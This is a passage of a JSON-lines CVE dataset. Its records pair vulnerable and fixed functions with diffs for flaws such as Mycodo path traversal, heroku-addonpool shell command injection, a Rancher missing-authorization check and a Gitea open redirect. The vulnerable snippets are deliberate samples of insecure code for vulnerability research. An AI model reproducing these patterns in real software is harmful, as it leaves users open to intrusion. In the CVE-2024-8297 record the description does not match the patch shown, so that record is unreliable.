id\n}"}], "fix_func": [{"id": "fix_go_123_1", "commit": "9351163", "file_path": "app/platform/service.go", "start_line": 372, "end_line": 381, "snippet": "func (ps *PlatformService) SetTelemetryId(id string) {\n\tps.telemetryId = id\n\n\tps.PostTelemetryIdHook()\n}\n\n// PostTelemetryIdHook triggers necessary events to propagate telemtery ID\nfunc (ps *PlatformService) PostTelemetryIdHook() {\n\tps.regenerateClientConfig()\n}"}], "vul_patch": "--- a/app/platform/service.go\n+++ b/app/platform/service.go\n@@ -1,3 +1,10 @@\n func (ps *PlatformService) SetTelemetryId(id string) {\n \tps.telemetryId = id\n+\n+\tps.PostTelemetryIdHook()\n }\n+\n+// PostTelemetryIdHook triggers necessary events to propagate telemtery ID\n+func (ps *PlatformService) PostTelemetryIdHook() {\n+\tps.regenerateClientConfig()\n+}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-41185", "cve_description": "Mycodo is an environmental monitoring and regulation system. An exploit in versions prior to 8.12.7 allows anyone with access to endpoints to download files outside the intended directory. A patch has been applied and a release made. Users should upgrade to version 8.12.7. As a workaround, users may manually apply the changes from the fix commit.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/kizniche/Mycodo", "patch_url": ["https://github.com/kizniche/Mycodo/commit/23ac5dd422029c2b6ae1701a3599b6d41b66a6a9"], "programing_language": "Python", "vul_func": [{"id": "vul_py_390_1", "commit": "69acf2646f5e50435e086bd544a9d264adc00edf", "file_path": "mycodo/mycodo_flask/routes_general.py", "start_line": 115, "end_line": 122, "snippet": "def send_note_attachment(filename):\n \"\"\"Return a file from the note attachment directory\"\"\"\n file_path = os.path.join(PATH_NOTE_ATTACHMENTS, filename)\n if file_path is not None:\n try:\n return send_file(file_path, as_attachment=True)\n except Exception:\n logger.exception(\"Send note attachment\")"}, {"id": "vul_py_390_2", "commit": "69acf2646f5e50435e086bd544a9d264adc00edf", "file_path": "mycodo/mycodo_flask/routes_general.py", "start_line": 127, "end_line": 154, "snippet": "def camera_img_return_path(camera_unique_id, img_type, filename):\n \"\"\"Return an image from stills or time-lapses\"\"\"\n camera = Camera.query.filter(Camera.unique_id == camera_unique_id).first()\n camera_path = assure_path_exists(\n os.path.join(PATH_CAMERAS, '{uid}'.format(uid=camera.unique_id)))\n if img_type == 'still':\n if camera.path_still:\n path = camera.path_still\n else:\n path = os.path.join(camera_path, img_type)\n elif img_type == 'timelapse':\n if camera.path_timelapse:\n path = camera.path_timelapse\n else:\n path = os.path.join(camera_path, img_type)\n else:\n return \"Unknown Image Type\"\n\n if os.path.isdir(path):\n files = (files for files in os.listdir(path)\n if os.path.isfile(os.path.join(path, files)))\n else:\n files = []\n if filename in files:\n path_file = os.path.join(path, filename)\n return send_file(path_file, mimetype='image/jpeg')\n\n return \"Image not found\""}], "fix_func": [{"id": "fix_py_390_1", "commit": "23ac5dd422029c2b6ae1701a3599b6d41b66a6a9", "file_path": "mycodo/mycodo_flask/routes_general.py", "start_line": 115, "end_line": 123, "snippet": "def send_note_attachment(filename):\n \"\"\"Return a file from the note attachment directory\"\"\"\n file_path = os.path.join(PATH_NOTE_ATTACHMENTS, filename)\n if file_path is not None:\n try:\n if os.path.abspath(file_path).startswith(PATH_NOTE_ATTACHMENTS):\n return send_file(file_path, as_attachment=True)\n except Exception:\n logger.exception(\"Send note attachment\")"}, {"id": "fix_py_390_2", "commit": "23ac5dd422029c2b6ae1701a3599b6d41b66a6a9", "file_path": "mycodo/mycodo_flask/routes_general.py", "start_line": 128, "end_line": 156, "snippet": "def camera_img_return_path(camera_unique_id, img_type, filename):\n \"\"\"Return an image from stills or time-lapses\"\"\"\n camera = Camera.query.filter(Camera.unique_id == camera_unique_id).first()\n camera_path = assure_path_exists(\n os.path.join(PATH_CAMERAS, '{uid}'.format(uid=camera.unique_id)))\n if img_type == 'still':\n if camera.path_still:\n path = camera.path_still\n else:\n path = os.path.join(camera_path, img_type)\n elif img_type == 'timelapse':\n if camera.path_timelapse:\n path = camera.path_timelapse\n else:\n path = os.path.join(camera_path, img_type)\n else:\n return \"Unknown Image Type\"\n\n if os.path.isdir(path):\n files = (files for files in os.listdir(path)\n if os.path.isfile(os.path.join(path, files)))\n else:\n files = []\n if filename in files:\n path_file = os.path.join(path, filename)\n if os.path.abspath(path_file).startswith(path):\n return send_file(path_file, mimetype='image/jpeg')\n\n return \"Image not found\""}], "vul_patch": "--- a/mycodo/mycodo_flask/routes_general.py\n+++ b/mycodo/mycodo_flask/routes_general.py\n@@ -3,6 +3,7 @@\n file_path = os.path.join(PATH_NOTE_ATTACHMENTS, filename)\n if file_path is not None:\n try:\n- return send_file(file_path, as_attachment=True)\n+ if os.path.abspath(file_path).startswith(PATH_NOTE_ATTACHMENTS):\n+ return send_file(file_path, as_attachment=True)\n except Exception:\n logger.exception(\"Send note attachment\")\n\n--- a/mycodo/mycodo_flask/routes_general.py\n+++ b/mycodo/mycodo_flask/routes_general.py\n@@ -23,6 +23,7 @@\n files = []\n if filename in files:\n path_file = os.path.join(path, filename)\n- return send_file(path_file, mimetype='image/jpeg')\n+ if os.path.abspath(path_file).startswith(path):\n+ return send_file(path_file, mimetype='image/jpeg')\n \n return \"Image not found\"\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-7634", "cve_description": "heroku-addonpool through 0.1.15 is vulnerable to Command Injection.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/nodef/heroku-addonpool", "patch_url": ["https://github.com/nodef/heroku-addonpool/commit/b1a5b316473ac92d783f3d54ee048d54082da38d"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_296_1", "commit": "7bd83e1650d8d6e6b8b436c5367c8cd27c4fcb3c", "file_path": "index.js", "start_line": 5, "end_line": 117, "snippet": "module.exports = function HerokuAddonPool(id, app, opt) {\n const unused = [];\n const supply = new Map();\n const removed = new Map();\n const pending = new Map();\n opt = opt||{};\n opt.config = opt.config||/\\S*/g;\n opt.log = opt.log||false;\n\n const log = function(msg) {\n if(opt.log) console.log(`${id}.${msg}`);\n };\n\n const supplySetOne = function(cfg) {\n return new Promise((fres, frej) => {\n const w = cfg.split('=');\n if(w[0].search(opt.config)<0) return;\n const key = w[0].substring(0, w[0].length-4);\n const val = {'value': w[1].substring(1, w[1].length-1)};\n cp.exec(`~/heroku addons:info ${key} --app ${app}`, (err, stdout) => {\n if(err) return frej(err);\n for(var r of stdout.toString().match(/[^\\r\\n]+/g)) {\n var k = _camel(r.startsWith('=')? 'name' : r.split(':')[0]);\n val[k] = r.substring(r.match(/[\\S\\s]+(=|:)\\s+/g)[0].length);\n }\n supply.set(key, val);\n fres(key);\n });\n });\n };\n\n const supplySet = function() {\n return new Promise((fres, frej) => {\n cp.exec(`~/heroku config -s --app ${app}`, (err, stdout) => {\n if(err) return frej(err);\n var pro = Promise.resolve();\n for(var cfg of stdout.toString().match(/[^\\r\\n]+/g)||[])\n ((val) => pro = pro.then(() => supplySetOne(val)))(cfg);\n pro.then(() => fres(supply));\n });\n });\n };\n\n const setup = function() {\n log(`setup()`);\n return supplySet().then((ans) => {\n for(var key of supply.keys()) {\n log(`setup:addUnused(${key})`);\n unused.push(key);\n }\n return ans;\n });\n };\n\n const remove = function(ref) {\n return new Promise((fres) => {\n if(unused.length===0) {\n log(`remove:addPending(${ref})`);\n return pending.set(ref, fres);\n }\n const key = unused.shift();\n removed.set(ref, key);\n log(`remove:getUnused(${ref}, ${key})`);\n fres(supply.get(key));\n });\n };\n\n const supplyReset = function(key) {\n log(`supplyReset(${key})`);\n const plan = supply.get(key).plan;\n return new Promise((fres, frej) => cp.exec(\n `~/heroku addons:destroy ${key} -a ${app} --confirm ${app} >/dev/null && `+\n `~/heroku addons:create ${plan} --as ${key} -a ${app} >/dev/null && `+\n `~/heroku config -s -a ${app} | grep ^${key}`,\n (err, stdout) => {\n const r = stdout.toString();\n fres(supply.get(key).value = r.substring(r.indexOf('=')+2, r.length-2));\n }\n ));\n };\n\n const pendingRemove = function() {\n if(!unused.length || !pending.size) return;\n const ref = pending.keys().next().value;\n const fres = pending.get(ref);\n pending.delete(ref);\n const key = unused.shift();\n removed.set(ref, key);\n log(`pendingRemove:getUnused(${ref}, ${key})`);\n fres(supply.get(key));\n return ref;\n };\n\n const add = function(ref) {\n if(pending.has(ref)) {\n log(`add:removePending(${ref})`);\n pending.delete(ref);\n }\n if(removed.has(ref)) {\n const key = removed.get(ref);\n removed.delete(ref);\n log(`add:addUnused(${ref}, ${key})`);\n return supplyReset(key).then(() => {\n unused.push(key);\n pendingRemove();\n return ref;\n });\n }\n return Promise.resolve(ref);\n };\n\n return {add, remove, setup};\n};"}], "fix_func": [{"id": "fix_js_296_1", "commit": "b1a5b316473ac92d783f3d54ee048d54082da38d", "file_path": "index.js", "start_line": 9, "end_line": 122, "snippet": "module.exports = function HerokuAddonPool(id, app, opt) {\n const unused = [];\n const supply = new Map();\n const removed = new Map();\n const pending = new Map();\n opt = opt||{};\n opt.config = opt.config||/\\S*/g;\n opt.log = opt.log||false;\n if(!RAPP.test(app)) throw new Error('Bad app name');\n\n const log = function(msg) {\n if(opt.log) console.log(`${id}.${msg}`);\n };\n\n const supplySetOne = function(cfg) {\n return new Promise((fres, frej) => {\n const w = cfg.split('=');\n if(w[0].search(opt.config)<0) return;\n const key = w[0].substring(0, w[0].length-4);\n const val = {'value': w[1].substring(1, w[1].length-1)};\n cp.exec(`~/heroku addons:info ${key} --app ${app}`, (err, stdout) => {\n if(err) return frej(err);\n for(var r of stdout.toString().match(/[^\\r\\n]+/g)) {\n var k = _camel(r.startsWith('=')? 'name' : r.split(':')[0]);\n val[k] = r.substring(r.match(/[\\S\\s]+(=|:)\\s+/g)[0].length);\n }\n supply.set(key, val);\n fres(key);\n });\n });\n };\n\n const supplySet = function() {\n return new Promise((fres, frej) => {\n cp.exec(`~/heroku config -s --app ${app}`, (err, stdout) => {\n if(err) return frej(err);\n var pro = Promise.resolve();\n for(var cfg of stdout.toString().match(/[^\\r\\n]+/g)||[])\n ((val) => pro = pro.then(() => supplySetOne(val)))(cfg);\n pro.then(() => fres(supply));\n });\n });\n };\n\n const setup = function() {\n log(`setup()`);\n return supplySet().then((ans) => {\n for(var key of supply.keys()) {\n log(`setup:addUnused(${key})`);\n unused.push(key);\n }\n return ans;\n });\n };\n\n const remove = function(ref) {\n return new Promise((fres) => {\n if(unused.length===0) {\n log(`remove:addPending(${ref})`);\n return pending.set(ref, fres);\n }\n const key = unused.shift();\n removed.set(ref, key);\n log(`remove:getUnused(${ref}, ${key})`);\n fres(supply.get(key));\n });\n };\n\n const supplyReset = function(key) {\n log(`supplyReset(${key})`);\n const plan = supply.get(key).plan;\n return new Promise((fres, frej) => cp.exec(\n `~/heroku addons:destroy ${key} -a ${app} --confirm ${app} >/dev/null && `+\n `~/heroku addons:create ${plan} --as ${key} -a ${app} >/dev/null && `+\n `~/heroku config -s -a ${app} | grep ^${key}`,\n (err, stdout) => {\n const r = stdout.toString();\n fres(supply.get(key).value = r.substring(r.indexOf('=')+2, r.length-2));\n }\n ));\n };\n\n const pendingRemove = function() {\n if(!unused.length || !pending.size) return;\n const ref = pending.keys().next().value;\n const fres = pending.get(ref);\n pending.delete(ref);\n const key = unused.shift();\n removed.set(ref, key);\n log(`pendingRemove:getUnused(${ref}, ${key})`);\n fres(supply.get(key));\n return ref;\n };\n\n const add = function(ref) {\n if(pending.has(ref)) {\n log(`add:removePending(${ref})`);\n pending.delete(ref);\n }\n if(removed.has(ref)) {\n const key = removed.get(ref);\n removed.delete(ref);\n log(`add:addUnused(${ref}, ${key})`);\n return supplyReset(key).then(() => {\n unused.push(key);\n pendingRemove();\n return ref;\n });\n }\n return Promise.resolve(ref);\n };\n\n return {add, remove, setup};\n};"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -6,6 +6,7 @@\n opt = opt||{};\n opt.config = opt.config||/\\S*/g;\n opt.log = opt.log||false;\n+ if(!RAPP.test(app)) throw new Error('Bad app name');\n \n const log = function(msg) {\n if(opt.log) console.log(`${id}.${msg}`);\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-8297", "cve_description": "A vulnerability was found in kitsada8621 Digital Library Management System 1.0. It has been classified as problematic. Affected is the function JwtRefreshAuth of the file middleware/jwt_refresh_token_middleware.go. The manipulation of the argument Authorization leads to improper output neutralization for logs. It is possible to launch the attack remotely. The name of the patch is 81b3336b4c9240f0bf50c13cb8375cf860d945f1. It is recommended to apply a patch to fix this issue.", "cwe_info": {"CWE-116": {"name": "Improper Encoding or Escaping of Output", "description": "The product prepares a structured message for communication with another component, but encoding or escaping of the data is either missing or done incorrectly. As a result, the intended structure of the message is not preserved."}}, "repo": "https://github.com/kitsada8621/Digital-Library-Management-System", "patch_url": ["https://github.com/kitsada8621/Digital-Library-Management-System/commit/81b3336b4c9240f0bf50c13cb8375cf860d945f1"], "programing_language": "Go", "vul_func": [{"id": "vul_go_233_1", "commit": "f495f3e", "file_path": "routes/borrow_route.go", "start_line": 10, "end_line": 27, "snippet": "func InitBorrowRoute(r *gin.RouterGroup) {\n\n\tborrowController := controllers.NewBorrowController()\n\tborrowRoute := r.Group(\"borrow\")\n\tborrowRoute.Use(middleware.JwtAuth())\n\n\tborrowRoute.POST(\"/create\", middleware.Role([]string{\"user\"}), borrowController.BorrowBook)\n\tborrowRoute.PUT(\"/update/:id\", middleware.Role([]string{\"user\"}), borrowController.UpdateBorrow)\n\tborrowRoute.PUT(\"/cancel/:id\", middleware.Role([]string{\"user\"}), borrowController.CancelBorrowBook)\n\tborrowRoute.GET(\"/history\", middleware.Role([]string{\"user\"}), borrowController.BorrowingHistory)\n\n\tborrowRoute.Use(middleware.Role([]string{\"admin\"}))\n\tborrowRoute.GET(\"/all\", borrowController.GetBorrows)\n\tborrowRoute.GET(\"/:id\", borrowController.BorrowDetails)\n\tborrowRoute.DELETE(\"/delete/:id\", borrowController.DeleteBorrow)\n\tborrowRoute.PUT(\"/approve/:id\", borrowController.ApproveBookBorrowing)\n\n}"}, {"id": "vul_go_233_2", "commit": "f495f3e", "file_path": "services/borrow_service.go", "start_line": 202, "end_line": 232, "snippet": "func (s *BorrowServiceImpl) UpdateBorrow(data dtos.BorrowDto, borrow models.Borrow) (int, error) {\n\n\tif borrow.BorrowStatus != 1 {\n\t\treturn http.StatusOK, fmt.Errorf(\"Unable to edit\")\n\t}\n\n\tbook, err := s.bookRepository.FindOne(bson.M{\"_id\": borrow.BookId})\n\tif err != nil {\n\t\treturn http.StatusInternalServerError, err\n\t}\n\n\tif book.BookStatus != 0 {\n\t\treturn http.StatusOK, fmt.Errorf(\"This book has been borrowed\")\n\t}\n\n\treturnDate, err := utils.StringToDate(data.ReturnDate)\n\tif err != nil {\n\t\treturn http.StatusBadRequest, err\n\t}\n\n\tif _, err := s.borrowRepository.Update(bson.M{\n\t\t\"$set\": bson.M{\n\t\t\t\"bookId\": book.ID,\n\t\t\t\"returnDate\": returnDate,\n\t\t},\n\t}, bson.M{\"_id\": borrow.ID}); err != nil {\n\t\treturn http.StatusInternalServerError, err\n\t}\n\n\treturn http.StatusOK, nil\n}"}], "fix_func": [{"id": "fix_go_233_1", "commit": "81b3336b4c9240f0bf50c13cb8375cf860d945f1", "file_path": "routes/borrow_route.go", "start_line": 10, "end_line": 27, "snippet": "func InitBorrowRoute(r *gin.RouterGroup) {\n\n\tborrowController := controllers.NewBorrowController()\n\tborrowRoute := r.Group(\"borrow\")\n\tborrowRoute.Use(middleware.JwtAuth())\n\n\tborrowRoute.POST(\"/create\", middleware.Role([]string{\"user\"}), borrowController.BorrowBook)\n\tborrowRoute.PUT(\"/update/:id\", middleware.Role([]string{\"user\"}), borrowController.UpdateBorrow)\n\tborrowRoute.PUT(\"/cancel/:id\", middleware.Role([]string{\"user\"}), borrowController.CancelBorrowBook)\n\tborrowRoute.GET(\"/history\", middleware.Role([]string{\"user\"}), borrowController.BorrowingHistory)\n\tborrowRoute.GET(\"/:id\", middleware.Role([]string{\"user\", \"admin\"}), borrowController.BorrowDetails)\n\n\tborrowRoute.Use(middleware.Role([]string{\"admin\"}))\n\tborrowRoute.GET(\"/all\", borrowController.GetBorrows)\n\tborrowRoute.DELETE(\"/delete/:id\", borrowController.DeleteBorrow)\n\tborrowRoute.PUT(\"/approve/:id\", borrowController.ApproveBookBorrowing)\n\n}"}, {"id": "fix_go_233_2", "commit": "81b3336b4c9240f0bf50c13cb8375cf860d945f1", "file_path": "services/borrow_service.go", "start_line": 202, "end_line": 237, "snippet": "func (s *BorrowServiceImpl) UpdateBorrow(data dtos.BorrowDto, borrow models.Borrow) (int, error) {\n\n\tif borrow.BorrowStatus != 1 {\n\t\treturn http.StatusOK, fmt.Errorf(\"Unable to edit\")\n\t}\n\n\tbookId, err := primitive.ObjectIDFromHex(data.BookId)\n\tif err != nil {\n\t\treturn http.StatusInternalServerError, err\n\t}\n\n\tbook, err := s.bookRepository.FindOne(bson.M{\"_id\": bookId})\n\tif err != nil {\n\t\treturn http.StatusInternalServerError, err\n\t}\n\n\tif book.BookStatus != 0 {\n\t\treturn http.StatusOK, fmt.Errorf(\"This book has been borrowed\")\n\t}\n\n\treturnDate, err := utils.StringToDate(data.ReturnDate)\n\tif err != nil {\n\t\treturn http.StatusBadRequest, err\n\t}\n\n\tif _, err := s.borrowRepository.Update(bson.M{\n\t\t\"$set\": bson.M{\n\t\t\t\"bookId\": book.ID,\n\t\t\t\"returnDate\": returnDate,\n\t\t},\n\t}, bson.M{\"_id\": borrow.ID}); err != nil {\n\t\treturn http.StatusInternalServerError, err\n\t}\n\n\treturn http.StatusOK, nil\n}"}], "vul_patch": "--- a/routes/borrow_route.go\n+++ b/routes/borrow_route.go\n@@ -8,10 +8,10 @@\n \tborrowRoute.PUT(\"/update/:id\", middleware.Role([]string{\"user\"}), borrowController.UpdateBorrow)\n \tborrowRoute.PUT(\"/cancel/:id\", middleware.Role([]string{\"user\"}), borrowController.CancelBorrowBook)\n \tborrowRoute.GET(\"/history\", middleware.Role([]string{\"user\"}), borrowController.BorrowingHistory)\n+\tborrowRoute.GET(\"/:id\", middleware.Role([]string{\"user\", \"admin\"}), borrowController.BorrowDetails)\n \n \tborrowRoute.Use(middleware.Role([]string{\"admin\"}))\n \tborrowRoute.GET(\"/all\", borrowController.GetBorrows)\n-\tborrowRoute.GET(\"/:id\", borrowController.BorrowDetails)\n \tborrowRoute.DELETE(\"/delete/:id\", borrowController.DeleteBorrow)\n \tborrowRoute.PUT(\"/approve/:id\", borrowController.ApproveBookBorrowing)\n \n\n--- a/services/borrow_service.go\n+++ b/services/borrow_service.go\n@@ -4,7 +4,12 @@\n \t\treturn http.StatusOK, fmt.Errorf(\"Unable to edit\")\n \t}\n \n-\tbook, err := s.bookRepository.FindOne(bson.M{\"_id\": borrow.BookId})\n+\tbookId, err := primitive.ObjectIDFromHex(data.BookId)\n+\tif err != nil {\n+\t\treturn http.StatusInternalServerError, err\n+\t}\n+\n+\tbook, err := s.bookRepository.FindOne(bson.M{\"_id\": bookId})\n \tif err != nil {\n \t\treturn http.StatusInternalServerError, err\n \t}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-21953", "cve_description": "A Missing Authorization vulnerability in of SUSE Rancher allows authenticated user to create an unauthorized shell pod and kubectl access in the local cluster This issue affects: SUSE Rancher Rancher versions prior to 2.5.17; Rancher versions prior to 2.6.10; Rancher versions prior to 2.7.1.", "cwe_info": {"CWE-862": {"name": "Missing Authorization", "description": "The product does not perform an authorization check when an actor attempts to access a resource or perform an action."}}, "repo": "https://github.com/rancher/rancher", "patch_url": ["https://github.com/rancher/rancher/commit/fd40f5ffabadb87d60e8200971fe16d778b3d699", "https://github.com/rancher/rancher/commit/3d1a120a18279b1e943f8e0b1143240d2d3e7f7f", "https://github.com/rancher/rancher/commit/c44801f50f8a77383904ef0da4066ffcc8daf6ae"], "programing_language": "Go", "vul_func": [{"id": "vul_go_143_1", "commit": "1f516d1", "file_path": "pkg/api/steve/proxy/proxy.go", "start_line": 47, "end_line": 80, "snippet": "func NewProxyMiddleware(sar v1.AuthorizationV1Interface,\n\tdialerFactory ClusterDialerFactory,\n\tclusters v3.ClusterCache,\n\tlocalSupport bool,\n\tlocalCluster http.Handler) (func(http.Handler) http.Handler, error) {\n\tcfg := authorizerfactory.DelegatingAuthorizerConfig{\n\t\tSubjectAccessReviewClient: sar,\n\t\tAllowCacheTTL: time.Second * time.Duration(settings.AuthorizationCacheTTLSeconds.GetInt()),\n\t\tDenyCacheTTL: time.Second * time.Duration(settings.AuthorizationDenyCacheTTLSeconds.GetInt()),\n\t\tWebhookRetryBackoff: &auth.WebhookBackoff,\n\t}\n\n\tauthorizer, err := cfg.New()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tproxyHandler := NewProxyHandler(authorizer, dialerFactory, clusters)\n\n\tmux := gmux.NewRouter()\n\tmux.UseEncodedPath()\n\tmux.PathPrefix(\"/api\").HandlerFunc(proxyHandler.authLocalCluster(mux))\n\tmux.Path(\"/v1/management.cattle.io.clusters/{clusterID}\").Queries(\"link\", \"shell\").HandlerFunc(routeToShellProxy(\"link\", \"shell\", localSupport, localCluster, mux, proxyHandler))\n\tmux.Path(\"/v1/management.cattle.io.clusters/{clusterID}\").Queries(\"action\", \"apply\").HandlerFunc(routeToShellProxy(\"action\", \"apply\", localSupport, localCluster, mux, proxyHandler))\n\tmux.Path(\"/v3/clusters/{clusterID}\").Queries(\"shell\", \"true\").HandlerFunc(routeToShellProxy(\"link\", \"shell\", localSupport, localCluster, mux, proxyHandler))\n\tmux.Path(\"/{prefix:k8s/clusters/[^/]+}{suffix:/v1.*}\").MatcherFunc(proxyHandler.MatchNonLegacy(\"/k8s/clusters/\")).Handler(proxyHandler)\n\n\treturn func(handler http.Handler) http.Handler {\n\t\treturn http.HandlerFunc(func(rw http.ResponseWriter, req *http.Request) {\n\t\t\tmux.NotFoundHandler = handler\n\t\t\tmux.ServeHTTP(rw, req)\n\t\t})\n\t}, nil\n}"}, {"id": "vul_go_143_2", "commit": "1f516d1", "file_path": "pkg/api/steve/proxy/proxy.go", "start_line": 135, "end_line": 146, "snippet": "func (h *Handler) authLocalCluster(router *gmux.Router) func(rw http.ResponseWriter, r *http.Request) {\n\treturn func(rw http.ResponseWriter, req *http.Request) {\n\t\tauthed := h.userCanAccessCluster(req, \"local\")\n\t\tif !authed {\n\t\t\tif req.Context().Value(auth.CattleAuthFailed) != \"true\" {\n\t\t\t\trw.WriteHeader(http.StatusUnauthorized)\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t\trouter.NotFoundHandler.ServeHTTP(rw, req)\n\t}\n}"}], "fix_func": [{"id": "fix_go_143_1", "commit": "fd40f5f", "file_path": "pkg/api/steve/proxy/proxy.go", "start_line": 47, "end_line": 80, "snippet": "func NewProxyMiddleware(sar v1.AuthorizationV1Interface,\n\tdialerFactory ClusterDialerFactory,\n\tclusters v3.ClusterCache,\n\tlocalSupport bool,\n\tlocalCluster http.Handler) (func(http.Handler) http.Handler, error) {\n\tcfg := authorizerfactory.DelegatingAuthorizerConfig{\n\t\tSubjectAccessReviewClient: sar,\n\t\tAllowCacheTTL: time.Second * time.Duration(settings.AuthorizationCacheTTLSeconds.GetInt()),\n\t\tDenyCacheTTL: time.Second * time.Duration(settings.AuthorizationDenyCacheTTLSeconds.GetInt()),\n\t\tWebhookRetryBackoff: &auth.WebhookBackoff,\n\t}\n\n\tauthorizer, err := cfg.New()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tproxyHandler := NewProxyHandler(authorizer, dialerFactory, clusters)\n\n\tmux := gmux.NewRouter()\n\tmux.UseEncodedPath()\n\tmux.PathPrefix(\"/api\").MatcherFunc(proxyHandler.matchManagementCRDs()).HandlerFunc(proxyHandler.authLocalCluster(mux))\n\tmux.Path(\"/v1/management.cattle.io.clusters/{clusterID}\").Queries(\"link\", \"shell\").HandlerFunc(routeToShellProxy(\"link\", \"shell\", localSupport, localCluster, mux, proxyHandler))\n\tmux.Path(\"/v1/management.cattle.io.clusters/{clusterID}\").Queries(\"action\", \"apply\").HandlerFunc(routeToShellProxy(\"action\", \"apply\", localSupport, localCluster, mux, proxyHandler))\n\tmux.Path(\"/v3/clusters/{clusterID}\").Queries(\"shell\", \"true\").HandlerFunc(routeToShellProxy(\"link\", \"shell\", localSupport, localCluster, mux, proxyHandler))\n\tmux.Path(\"/{prefix:k8s/clusters/[^/]+}{suffix:/v1.*}\").MatcherFunc(proxyHandler.MatchNonLegacy(\"/k8s/clusters/\")).Handler(proxyHandler)\n\n\treturn func(handler http.Handler) http.Handler {\n\t\treturn http.HandlerFunc(func(rw http.ResponseWriter, req *http.Request) {\n\t\t\tmux.NotFoundHandler = handler\n\t\t\tmux.ServeHTTP(rw, req)\n\t\t})\n\t}, nil\n}"}, {"id": "fix_go_143_2", "commit": "fd40f5f", "file_path": "pkg/api/steve/proxy/proxy.go", "start_line": 135, "end_line": 144, "snippet": "func (h *Handler) authLocalCluster(router *gmux.Router) func(rw http.ResponseWriter, r *http.Request) {\n\treturn func(rw http.ResponseWriter, req *http.Request) {\n\t\tauthed := h.userCanAccessCluster(req, \"local\")\n\t\tif !authed {\n\t\t\trw.WriteHeader(http.StatusForbidden)\n\t\t\treturn\n\t\t}\n\t\trouter.NotFoundHandler.ServeHTTP(rw, req)\n\t}\n}"}, {"id": "fix_go_143_3", "commit": "fd40f5f", "file_path": "pkg/api/steve/proxy/proxy.go", "start_line": 146, "end_line": 155, "snippet": "func (h *Handler) matchManagementCRDs() gmux.MatcherFunc {\n\treturn func(req *http.Request, match *gmux.RouteMatch) bool {\n\t\tsplitPath := strings.Split(req.URL.Path, \"/\")\n\t\tif len(splitPath) < 3 {\n\t\t\treturn false\n\t\t}\n\t\tapiGroup := splitPath[2]\n\t\treturn apiGroup == managementv3.GroupName\n\t}\n}"}], "vul_patch": "--- a/pkg/api/steve/proxy/proxy.go\n+++ b/pkg/api/steve/proxy/proxy.go\n@@ -19,7 +19,7 @@\n \n \tmux := gmux.NewRouter()\n \tmux.UseEncodedPath()\n-\tmux.PathPrefix(\"/api\").HandlerFunc(proxyHandler.authLocalCluster(mux))\n+\tmux.PathPrefix(\"/api\").MatcherFunc(proxyHandler.matchManagementCRDs()).HandlerFunc(proxyHandler.authLocalCluster(mux))\n \tmux.Path(\"/v1/management.cattle.io.clusters/{clusterID}\").Queries(\"link\", \"shell\").HandlerFunc(routeToShellProxy(\"link\", \"shell\", localSupport, localCluster, mux, proxyHandler))\n \tmux.Path(\"/v1/management.cattle.io.clusters/{clusterID}\").Queries(\"action\", \"apply\").HandlerFunc(routeToShellProxy(\"action\", \"apply\", localSupport, localCluster, mux, proxyHandler))\n \tmux.Path(\"/v3/clusters/{clusterID}\").Queries(\"shell\", \"true\").HandlerFunc(routeToShellProxy(\"link\", \"shell\", localSupport, localCluster, mux, proxyHandler))\n\n--- a/pkg/api/steve/proxy/proxy.go\n+++ b/pkg/api/steve/proxy/proxy.go\n@@ -2,10 +2,8 @@\n \treturn func(rw http.ResponseWriter, req *http.Request) {\n \t\tauthed := h.userCanAccessCluster(req, \"local\")\n \t\tif !authed {\n-\t\t\tif req.Context().Value(auth.CattleAuthFailed) != \"true\" {\n-\t\t\t\trw.WriteHeader(http.StatusUnauthorized)\n-\t\t\t\treturn\n-\t\t\t}\n+\t\t\trw.WriteHeader(http.StatusForbidden)\n+\t\t\treturn\n \t\t}\n \t\trouter.NotFoundHandler.ServeHTTP(rw, req)\n \t}\n\n--- /dev/null\n+++ b/pkg/api/steve/proxy/proxy.go\n@@ -0,0 +1,10 @@\n+func (h *Handler) matchManagementCRDs() gmux.MatcherFunc {\n+\treturn func(req *http.Request, match *gmux.RouteMatch) bool {\n+\t\tsplitPath := strings.Split(req.URL.Path, \"/\")\n+\t\tif len(splitPath) < 3 {\n+\t\t\treturn false\n+\t\t}\n+\t\tapiGroup := splitPath[2]\n+\t\treturn apiGroup == managementv3.GroupName\n+\t}\n+}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-3515", "cve_description": "Open Redirect in GitHub repository go-gitea/gitea prior to 1.19.4.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/go-gitea/gitea", "patch_url": ["https://github.com/go-gitea/gitea/commit/9aaaf980f0ba15611f30568bd67bce3ec12954e2"], "programing_language": "Go", "vul_func": [{"id": "vul_go_98_1", "commit": "263ed09", "file_path": "modules/context/context_response.go", "start_line": 46, "end_line": 68, "snippet": "func (ctx *Context) RedirectToFirst(location ...string) {\n\tfor _, loc := range location {\n\t\tif len(loc) == 0 